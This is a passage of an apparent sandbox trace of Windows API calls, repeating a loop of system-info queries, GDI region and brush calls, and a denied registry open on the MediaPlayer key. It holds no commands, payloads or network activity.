out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.421] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.421] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.421] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.421] BeginPath (hdc=0x0) returned 0 [0088.421] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.421] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.421] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.421] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.421] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.421] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.421] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.421] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.421] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xb80401d3 [0088.421] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xb60401d6 [0088.421] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041b2d [0088.421] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041b2e [0088.421] CombineRgn (hrgnDst=0x1041b2d, hrgnSrc1=0xb80401d3, hrgnSrc2=0xb60401d6, iMode=1) returned 1 [0088.421] CombineRgn (hrgnDst=0x1041b2e, hrgnSrc1=0xb80401d3, hrgnSrc2=0xb60401d6, iMode=4) returned 2 [0088.421] CreateSolidBrush (color=0xff) returned 0x2101b2c [0088.421] CreateSolidBrush (color=0xff0000) returned 0x1101b2f [0088.421] DeleteObject (ho=0x1101b2f) returned 1 [0088.421] DeleteObject (ho=0xb60401d6) returned 1 [0088.421] DeleteObject (ho=0xb80401d3) returned 1 [0088.421] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.421] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.421] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.421] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.421] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.421] BeginPath (hdc=0x0) returned 0 [0088.421] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.421] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.422] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.422] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.422] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.422] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.422] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.422] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.476] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xb70401d6 [0088.476] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xb90401d3 [0088.476] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1042091 [0088.476] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1042092 [0088.476] CombineRgn (hrgnDst=0x1042091, hrgnSrc1=0xb70401d6, hrgnSrc2=0xb90401d3, iMode=1) returned 1 [0088.476] CombineRgn (hrgnDst=0x1042092, hrgnSrc1=0xb70401d6, hrgnSrc2=0xb90401d3, iMode=4) returned 2 [0088.476] CreateSolidBrush (color=0xff) returned 0x2101b2f [0088.476] CreateSolidBrush (color=0xff0000) returned 0x1102093 [0088.476] DeleteObject (ho=0x1102093) returned 1 [0088.476] DeleteObject (ho=0xb90401d3) returned 1 [0088.476] DeleteObject (ho=0xb70401d6) returned 1 [0088.476] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.476] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.476] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.476] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.476] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.476] BeginPath (hdc=0x0) returned 0 [0088.476] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.476] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.476] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.476] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.476] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.477] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.477] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.477] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.477] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xba0401d3 [0088.477] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xb80401d6 [0088.477] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1042094 [0088.477] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1042095 [0088.477] CombineRgn (hrgnDst=0x1042094, hrgnSrc1=0xba0401d3, hrgnSrc2=0xb80401d6, iMode=1) returned 1 [0088.477] CombineRgn (hrgnDst=0x1042095, hrgnSrc1=0xba0401d3, hrgnSrc2=0xb80401d6, iMode=4) returned 2 [0088.477] CreateSolidBrush (color=0xff) returned 0x2102093 [0088.477] CreateSolidBrush (color=0xff0000) returned 0x1102096 [0088.477] DeleteObject (ho=0x1102096) returned 1 [0088.477] DeleteObject (ho=0xb80401d6) returned 1 [0088.477] DeleteObject (ho=0xba0401d3) returned 1 [0088.477] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.477] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.477] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.477] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.477] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.477] BeginPath (hdc=0x0) returned 0 [0088.477] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.477] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.477] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.477] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.477] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.477] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.477] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.477] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.478] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xb90401d6 [0088.478] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xbb0401d3 [0088.478] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1042097 [0088.478] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1042098 [0088.478] CombineRgn (hrgnDst=0x1042097, hrgnSrc1=0xb90401d6, hrgnSrc2=0xbb0401d3, iMode=1) returned 1 [0088.478] CombineRgn (hrgnDst=0x1042098, hrgnSrc1=0xb90401d6, hrgnSrc2=0xbb0401d3, iMode=4) returned 2 [0088.478] CreateSolidBrush (color=0xff) returned 0x2102096 [0088.478] CreateSolidBrush (color=0xff0000) returned 0x1102099 [0088.478] DeleteObject (ho=0x1102099) returned 1 [0088.478] DeleteObject (ho=0xbb0401d3) returned 1 [0088.478] DeleteObject (ho=0xb90401d6) returned 1 [0088.478] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.478] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.478] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.478] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.478] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.478] BeginPath (hdc=0x0) returned 0 [0088.478] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.478] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.478] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.478] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.478] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.478] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.478] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.478] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.479] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xbc0401d3 [0088.479] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xba0401d6 [0088.479] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104209a [0088.479] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104209b [0088.479] CombineRgn (hrgnDst=0x104209a, hrgnSrc1=0xbc0401d3, hrgnSrc2=0xba0401d6, iMode=1) returned 1 [0088.479] CombineRgn (hrgnDst=0x104209b, hrgnSrc1=0xbc0401d3, hrgnSrc2=0xba0401d6, iMode=4) returned 2 [0088.479] CreateSolidBrush (color=0xff) returned 0x2102099 [0088.479] CreateSolidBrush (color=0xff0000) returned 0x110209c [0088.479] DeleteObject (ho=0x110209c) returned 1 [0088.479] DeleteObject (ho=0xba0401d6) returned 1 [0088.479] DeleteObject (ho=0xbc0401d3) returned 1 [0088.479] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.479] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.479] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.479] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.479] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.479] BeginPath (hdc=0x0) returned 0 [0088.479] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.479] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.479] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.479] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.479] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.479] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.479] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.479] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.479] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xbb0401d6 [0088.479] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xbd0401d3 [0088.479] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104209d [0088.479] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104209e [0088.479] CombineRgn (hrgnDst=0x104209d, hrgnSrc1=0xbb0401d6, hrgnSrc2=0xbd0401d3, iMode=1) returned 1 [0088.479] CombineRgn (hrgnDst=0x104209e, hrgnSrc1=0xbb0401d6, hrgnSrc2=0xbd0401d3, iMode=4) returned 2 [0088.479] CreateSolidBrush (color=0xff) returned 0x210209c [0088.479] CreateSolidBrush (color=0xff0000) returned 0x110209f [0088.479] DeleteObject (ho=0x110209f) returned 1 [0088.479] DeleteObject (ho=0xbd0401d3) returned 1 [0088.479] DeleteObject (ho=0xbb0401d6) returned 1 [0088.479] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.480] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.480] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.480] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.480] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.480] BeginPath (hdc=0x0) returned 0 [0088.480] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.480] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.480] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.480] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.480] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.480] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.480] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.480] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.480] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xbe0401d3 [0088.480] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xbc0401d6 [0088.480] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10420a0 [0088.480] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10420a1 [0088.480] CombineRgn (hrgnDst=0x10420a0, hrgnSrc1=0xbe0401d3, hrgnSrc2=0xbc0401d6, iMode=1) returned 1 [0088.480] CombineRgn (hrgnDst=0x10420a1, hrgnSrc1=0xbe0401d3, hrgnSrc2=0xbc0401d6, iMode=4) returned 2 [0088.480] CreateSolidBrush (color=0xff) returned 0x210209f [0088.480] CreateSolidBrush (color=0xff0000) returned 0x11020a2 [0088.480] DeleteObject (ho=0x11020a2) returned 1 [0088.480] DeleteObject (ho=0xbc0401d6) returned 1 [0088.480] DeleteObject (ho=0xbe0401d3) returned 1 [0088.480] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.480] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.480] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.480] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.480] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.480] BeginPath (hdc=0x0) returned 0 [0088.480] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.480] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.480] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.480] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.480] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.480] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.480] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.480] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.481] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xbd0401d6 [0088.481] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xbf0401d3 [0088.481] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10420a3 [0088.481] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10420a4 [0088.481] CombineRgn (hrgnDst=0x10420a3, hrgnSrc1=0xbd0401d6, hrgnSrc2=0xbf0401d3, iMode=1) returned 1 [0088.481] CombineRgn (hrgnDst=0x10420a4, hrgnSrc1=0xbd0401d6, hrgnSrc2=0xbf0401d3, iMode=4) returned 2 [0088.481] CreateSolidBrush (color=0xff) returned 0x21020a2 [0088.481] CreateSolidBrush (color=0xff0000) returned 0x11020a5 [0088.481] DeleteObject (ho=0x11020a5) returned 1 [0088.481] DeleteObject (ho=0xbf0401d3) returned 1 [0088.481] DeleteObject (ho=0xbd0401d6) returned 1 [0088.481] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.481] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.481] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.481] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.481] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.481] BeginPath (hdc=0x0) returned 0 [0088.481] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.481] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.481] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.481] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.481] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.481] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.481] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.481] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.481] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xc00401d3 [0088.481] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xbe0401d6 [0088.481] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10420a6 [0088.481] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10420a7 [0088.481] CombineRgn (hrgnDst=0x10420a6, hrgnSrc1=0xc00401d3, hrgnSrc2=0xbe0401d6, iMode=1) returned 1 [0088.481] CombineRgn (hrgnDst=0x10420a7, hrgnSrc1=0xc00401d3, hrgnSrc2=0xbe0401d6, iMode=4) returned 2 [0088.481] CreateSolidBrush (color=0xff) returned 0x21020a5 [0088.481] CreateSolidBrush (color=0xff0000) returned 0x11020a8 [0088.481] DeleteObject (ho=0x11020a8) returned 1 [0088.481] DeleteObject (ho=0xbe0401d6) returned 1 [0088.481] DeleteObject (ho=0xc00401d3) returned 1 [0088.481] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.481] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.482] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.482] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.482] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.482] BeginPath (hdc=0x0) returned 0 [0088.482] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.482] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.482] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.482] GetClientRect (in: 